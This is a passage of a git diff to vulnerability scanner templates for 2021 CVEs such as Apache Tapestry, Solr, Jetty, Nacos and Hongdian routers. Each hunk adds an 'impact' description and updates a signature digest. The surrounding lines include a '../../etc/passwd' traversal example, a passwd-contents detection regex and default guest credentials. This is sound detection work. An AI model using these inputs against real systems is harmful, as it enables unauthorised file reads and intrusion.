-# digest: 4a0a004730450221008ab82810c70d7f83959bb507930bdfcd925afd1740d9d9e21a8000461168904c022055b5fd3e39a4eeb713adf30c426ee77d31a528e071ab969b2eb96dff37c895bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bb9d09edeb8b15de01a03994e2a5d7dc460f618c97738f842890a06d797aa3110220583fd639fd692defcf9ce01aac462f9cf704ce1e0055975ec7987eac98c189b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml
index 026591c962..b123a584c7 100644
--- a/http/cves/2021/CVE-2021-27748.yaml
+++ b/http/cves/2021/CVE-2021-27748.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
   remediation: |
     Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
   reference:
@@ -39,5 +41,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502200d8020b3a03e84cf3bd87a7632f865e6057f37365325c521fabb4a70dadc061d022100bddaa747926664b7fbf81cce7b87cc9d0b411c9c1a63f64776edd962f4d3d1e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009f8f88e6248eca75439054b3c6f178effb456f3c92a03cfe4e7b1f06468e5d6002203eb4e6faf0cdaa43b86687902ba26c1bcb46a799202ae92695a750a06c0214ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml
index e9a998f3d5..1bf6fde0f3 100644
--- a/http/cves/2021/CVE-2021-27850.yaml
+++ b/http/cves/2021/CVE-2021-27850.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Apache to fix the vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
           - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
         internal: true
         part: header
-# digest: 4a0a00473045022100b773409b4a3b70cc149c929a016464647a37fa3bcb57a8621fef31648e937478022012bbc2c03790d6c13f11629b18309a4fb33e1e0cf789ca52803c6551d5f784e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200f82b78e92d2d014a0a86a948cc2871e789331c0b5dde03c4ec206ebc9a8e4c1022040c032ed6c0f921cb0b3f93c6372415043438f74806fb231124e11915ae9f7fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml
index 415f4a9736..c439ef861d 100644
--- a/http/cves/2021/CVE-2021-27905.yaml
+++ b/http/cves/2021/CVE-2021-27905.yaml
@@ -5,6 +5,8 @@ info:
   author: hackergautam
   severity: critical
   description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: This issue is resolved in Apache Solr 8.8.2 and later.
   reference:
     - https://www.anquanke.com/post/id/238201
@@ -52,4 +54,4 @@ http:
         regex:
           - '"name"\:"(.*?)"'
         internal: true
-# digest: 4a0a004730450220512f954501cf457b314686088d47f4ca9a1342b0d4ad2346e88e919fa4c46d96022100c9554725c22c86de785642b4c5792e1e4022cafc3320872b0c42a0dcd8f27edd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f84880ba892b326c1e06e7a1df194eb8d0570bef585ac65d73015ba8e8d4cfd022100b60f82e2932e49dd701368f665d8e455e88a0e116e25cc15b45796ca709485f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml
index f81147dc6f..e23ef1650e 100644
--- a/http/cves/2021/CVE-2021-27909.yaml
+++ b/http/cves/2021/CVE-2021-27909.yaml
@@ -5,6 +5,8 @@ info:
   author: kiransau
   severity: medium
   description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b203317631873ab7e6f5a3b581cc73a5788bb8ff1b628822914394e4106ebdac02202e22dcc922afa6cdd4935c608db9520d8aaac74250096b8a50b856a07e8e5663:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022071565d0653ca589706ec60310d9dab49e798f451f7d4511c01b51238932daad602204aff378cc78d426ff4a5624a5b083b6baf8995466a60f54ed957d7b025779fc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml
index 10761a64c9..a49d8b642b 100644
--- a/http/cves/2021/CVE-2021-27931.yaml
+++ b/http/cves/2021/CVE-2021-27931.yaml
@@ -5,6 +5,8 @@ info:
   author: alph4byt3
   severity: critical
   description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems.
   remediation: |
     Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a0046304402202ea4aa6bb00d8b818e402622c134b3b7ac8f2f4c0e82bb6308b591353c541f2b0220032d337764ea7fd14b54255c3ab3b4b71bf7d04d2c202afc3ea83b21aca989e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200a5f336175f3ef460c1bbcbb1a7eb6c343e861c6fe23075954ba09dad4889b80022047eceb5b93755d14d0bf306c8017c88e9b22c87bea1354a36a306fe0c6d12a99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml
index fb97ef4b0d..d7bb53e2e2 100644
--- a/http/cves/2021/CVE-2021-28073.yaml
+++ b/http/cves/2021/CVE-2021-28073.yaml
@@ -5,6 +5,8 @@ info:
   author: z3bd
   severity: critical
   description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system.
   remediation: Upgrade to version 4.3 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27573
@@ -39,5 +41,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a004830460221009fdf27d1824ab999dd5478ade76a48ce179d3ddde3cf1697c060c0efc4257117022100d725998c750d7df5e6eb8312f932a74e46c95325147f7d3eaf3d0edbc9dc62ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201892bd6d4d2152e326a4a7b10878d8a52fedc0766fb466d9862c71724dcd8127022100d57172bff17c0843ff87752fde9195baa01f8b7a325ad70d63975cedc37e235e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml
index 92fafd5608..c48337bd2e 100644
--- a/http/cves/2021/CVE-2021-28149.yaml
+++ b/http/cves/2021/CVE-2021-28149.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fbeff871273d166c45419cd72afb885c11a2f8c5bc28280fdfc868d22243fc69022100c4a8940ba541a43f56ff01fa92a44fd1393b89eb9a9cd15ed21c3f5562680706:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c508640090c4df0fea2c1ed0b87bd86e0ea7999a67926bf6485385980b13efda022100f37bedec1b8c90037e647351176c4ed00ad634886032a6fd04986d2b8e862ade:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml
index 0bc4497341..fe1e46e957 100644
--- a/http/cves/2021/CVE-2021-28150.yaml
+++ b/http/cves/2021/CVE-2021-28150.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users.
   remediation: |
     Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150).
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022064647886286188d6f3a42e1ea210004904281e65b35e86ab51e55f3b6bf627fe022100c9d0e9a7e83289cde0b104a0f60a5683864e23fa7064c49f64f06a0657f829cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201bb95cbe05596847e93f5d6aa2a241360590c463dfb6a582fa31818f2ed7f852022100decf820cfa3e8c096aa46d8ea67a9b3c25277841aaf3f95b13ca36e0f50160eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml
index 5f689143f4..55540a1df3 100644
--- a/http/cves/2021/CVE-2021-28151.yaml
+++ b/http/cves/2021/CVE-2021-28151.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
   remediation: |
     Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware.
   reference:
@@ -61,4 +63,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204e0b379e627c9f1811838ec84896fe07aa8b1294bb3c77cf29d132d35850d2d2022100c402b74b1ec13720423d8ec34f018cb7bae0f25834e454cf15a0ae6da8505a44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210082e977b9fa83a77bfb0a2ccd126560866ce89c966a4986a328328be20ef1aa74022100a98a22816d0b87cd6e83d1ebef2b95ab9c1e56494bd634c5857eaf5693521acb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml
index de6d05a878..cdb744e496 100644
--- a/http/cves/2021/CVE-2021-28164.yaml
+++ b/http/cves/2021/CVE-2021-28164.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.
   remediation: |
     Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
           - "contains_all(header, 'application/xml')"
           - "status_code == 200"
         condition: and
-# digest: 490a0046304402200e8c9fa430ff4240ae13255d301fa1db66fc39fbed42529322c482864fdadab602200bba4dd6c49ab27ab6d0610083df1ee76bffb4f49f5e13de17950881ff3e4dce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022073e2de6ed3d7d9f7bcc921732d086568614e9ae50c31c3b9d8cad4c1c5e5c6e2022100c27e2a5612dec726b3729e04311efd9d04d273d3a6669eeac4f4d0227909ae37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml
index f245b6f229..0d02c8fcd4 100644
--- a/http/cves/2021/CVE-2021-28169.yaml
+++ b/http/cves/2021/CVE-2021-28169.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure.  Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.
   remediation: |
     Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022068da8d01f3643b382e208e1443afffc241598ad3a07ff10d30b319e55aada0b5022042ffecb3d7abe79d2fd76ca62a20820515b6158913654394b0a48c14587c0168:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220275c8352bc8cbf2850d5f8846afdc2b5446a8f1a2b37e8ba145871739c3c62a402206a26d7d2043816abad21fb453d1c8cb08ad0a4c28dd95c78cfba769e8fb0fb57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml
index 2bd9fc24f2..9f55baae4e 100644
--- a/http/cves/2021/CVE-2021-28377.yaml
+++ b/http/cves/2021/CVE-2021-28377.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution.
   remediation: |
     Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022065a68a962732b3e4af57c2b5916d36d1b8ce4d724cf2f49415ca5f84f9a40151022062976a82715ec649baf5ff7581238d243585f3ff7addf9851519815f841f42dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e6c4336f4033e5d5ab67a5075048b51c26e00cedb31dca5cbf93d84e87d90eca02203333e89d63ac9ddfd472a07c5be8ff567d9418966beecd1265d6813360f07a9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml
index 1224647ad0..f72cadac7c 100644
--- a/http/cves/2021/CVE-2021-28419.yaml
+++ b/http/cves/2021/CVE-2021-28419.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to a patched version of SEO Panel or apply the necessary security patches.
   reference:
@@ -55,4 +57,4 @@ http:
           - 'status_code_3 == 200'
           - 'contains(body_3, "Overall Report Summary")'
         condition: and
-# digest: 4a0a00473045022053732a34ddf7e04eb16687f73764adbf030ec13271a9423a7c353a0078cbf9a4022100b1dddbd69dcb2cb5ce8780b687cda9abb437deea36c78c7642e0ce27344488a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200e856f4168dea51cc478dcfcfce9d0c9d16d6b007aca76f2ffd88e6c4f4380e0022100f5961edaf009254ccf426d5f7fa235d571a79abd8b50d47366a7a37f74bceb5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml
index 34acb135de..e6ba9a798e 100644
--- a/http/cves/2021/CVE-2021-28854.yaml
+++ b/http/cves/2021/CVE-2021-28854.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: high
   description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as user credentials or customer data.
   remediation: |
     Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected.
   reference:
@@ -35,5 +37,4 @@ http:
         words:
           - 'vdc_db_query'
         part: body
-
-# digest: 4b0a00483046022100b1f404ce46d1347113282e2df7a99a858c9b69a9956316383476fc6a29276efc022100d0f39aad355d1a3c546b2da1dde41d27c2f5e8d4538db17bc2b569a402355f1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bf646c86b3a4e252b7ece6224c525e30d907ff71916b36f241252d3246f6210e02204272a8ce4d191b58f006e41cc96c6f375f3b50194c430785ca41e8e2fb80a626:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml
index 4e2443ca65..6126824d75 100644
--- a/http/cves/2021/CVE-2021-28918.yaml
+++ b/http/cves/2021/CVE-2021-28918.yaml
@@ -5,6 +5,8 @@ info:
   author: johnjhacking
   severity: critical
   description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+  impact: |
+    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: regex
         regex:
           - "root:.*:0:0:"
-# digest: 490a00463044022067c0c5cc6285403dbdd398b6c68daf5f9832c6723046ac98ba9556d150a32dc802205b83c8a726180d13511f55da07870abf2fe1c847a01ccd8dc88cf6aeea77b1b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f510c906e211a02d676b445892d8d5d2c2eb55792ddbffe9b30551121bb6d404022100ea0dda4345ad3fcf3912afe9b2df190e795e3295e64c5ab87f3b1cb72e6f4d11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml
index 33193c9683..51b9d11ea8 100644
--- a/http/cves/2021/CVE-2021-28937.yaml
+++ b/http/cves/2021/CVE-2021-28937.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.
+  impact: |
+    An attacker can obtain the repeater's password, compromising the security of the network.
   remediation: |
     Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220104a056922fb2e8437feda309a52c1e35d825c1ef5bb02f0de422d94298a0d85022100fc2e393d7f56fafdc72c2285a6fa61780648112235fc9194c19a4835ef38a580:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022050e819bc0cf4f431b4320ea02c6ece66cd5deebc1c712dd8fb4f6d1929c4d24502207bfea1a99add8cba25b5776474a1924f6dd608f6538150bb4b8dd9dd83715123:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml
index acbbdc5b7c..e45540813c 100644
--- a/http/cves/2021/CVE-2021-29156.yaml
+++ b/http/cves/2021/CVE-2021-29156.yaml
@@ -5,6 +5,8 @@ info:
   author: melbadry9,xelkomy
   severity: high
   description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
+  impact: |
+    Allows an attacker to execute arbitrary LDAP queries and potentially gain unauthorized access to sensitive information or perform unauthorized actions
   remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
   reference:
     - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors
@@ -36,4 +38,4 @@ http:
       - type: dsl
         dsl:
           - 'contains(body, "jato.pageSession") && status_code==200'
-# digest: 4a0a00473045022100edadb82d05de7f3c183d7300ba75489afb4e02dcceea05fcf4a3264b35383644022044caf248d61e6289ada0e92ceda2323cb8176da8a05ce8edefba719b96cb1fc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220405ae31452508750ae9da88f69f9ff4b1aa88014cf706d81a21b09269653f557022100b34ae423c190af63914e6795ae1ce0a89acfc690578020bb84843f837a1ca21e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml
index 8e2c38f597..13403bdfb3 100644
--- a/http/cves/2021/CVE-2021-29203.yaml
+++ b/http/cves/2021/CVE-2021-29203.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: critical
   description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.
   remediation: |
     Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 201
-# digest: 4a0a004730450220444b8017759cd7f1d88dd23337e945d5a07bc1a01afa212bb429e87f5d1a36ee022100e81e52f9a08529b4f063024c5c161fa02146395c0099a98306b5b25cbdbbb280:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202f733c0a9cc9309f9f716abd7c2b0dd0e63f1ec8bd0ecff3d7505505fb81e5da022100a2f856705a7580b2da505c542e975095ea38845b0e2aabfe764587dfef328462:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml
index c485c48c9b..6f716582d3 100644
--- a/http/cves/2021/CVE-2021-29441.yaml
+++ b/http/cves/2021/CVE-2021-29441.yaml
@@ -12,6 +12,8 @@ info:
     enables Nacos servers to bypass this filter and therefore skip authentication checks.
     This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
     This issue may allow any user to carry out any administrative tasks on the Nacos server.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.
   remediation: |
     Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).
   reference:
@@ -63,4 +65,4 @@ http:
         part: header
         words:
           - "application/json"
-# digest: 4a0a00473045022100f6da6f7c0d6cf04a6744d1a30f08d08a28e3aff1f000eb47606d65dbf8509a1402207037c37a79c1a89ea142a7ef2739af1918a3f94d13e5f012c6f1c13b3f4762da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210097153bdbd7f65e14f2e4c67160dbcba77ee80771d77dd3c49c27133cf76e1f6c0220439c327f647dcadc4449138256e1543b6d78f2ca04a7522af16cb481d4799c44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml
index c2920b4191..f14f9d1edf 100644
--- a/http/cves/2021/CVE-2021-29442.yaml
+++ b/http/cves/2021/CVE-2021-29442.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.
   remediation: |
     Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442).
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c6b7293191c5deb6497f8d86d5692f2d01a795b484f33b181255173e007d0fcc022005ee0daddfcc46810f5194d1f9103d7cdff2b37e1ae93e5d60a1cbe18a60069b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022076a8e73c63ea8c2c1e2c17724384551fc3d6152d1cca3a0ce8852c5b68b587fc02206e91cd5d616586e2bbbe1bce45f21bf2cd28da0d2371983b0d9181fb7a7f40ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml
index 62e2a88ddb..711f4ef84f 100644
--- a/http/cves/2021/CVE-2021-29484.yaml
+++ b/http/cves/2021/CVE-2021-29484.yaml
@@ -5,6 +5,8 @@ info:
   author: rootxharsh,iamnoooob
   severity: medium
   description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: This issue has been fixed in 4.3.3.
   reference:
     - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205260e9d3c48f5346f2b2b089cffcc4f33ac2c5a76d8c6420207418754c0e35e5022100c26bcef20d698fd5230ee0b157e615217ac8130a5c300e9d0f7e5ad4ea1e98fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e46d579128e130408f9242340b5f912fe6d1cec345390238345e316b6b131cce022100eecb1c070b538d10eb24d4fb64a3187a5ccabb85f22a621e7e0180dc98e48644:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml
index bf2cb1f71a..c73dcdc690 100644
--- a/http/cves/2021/CVE-2021-29490.yaml
+++ b/http/cves/2021/CVE-2021-29490.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
+  impact: |
+    This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the target system.
   remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
   reference:
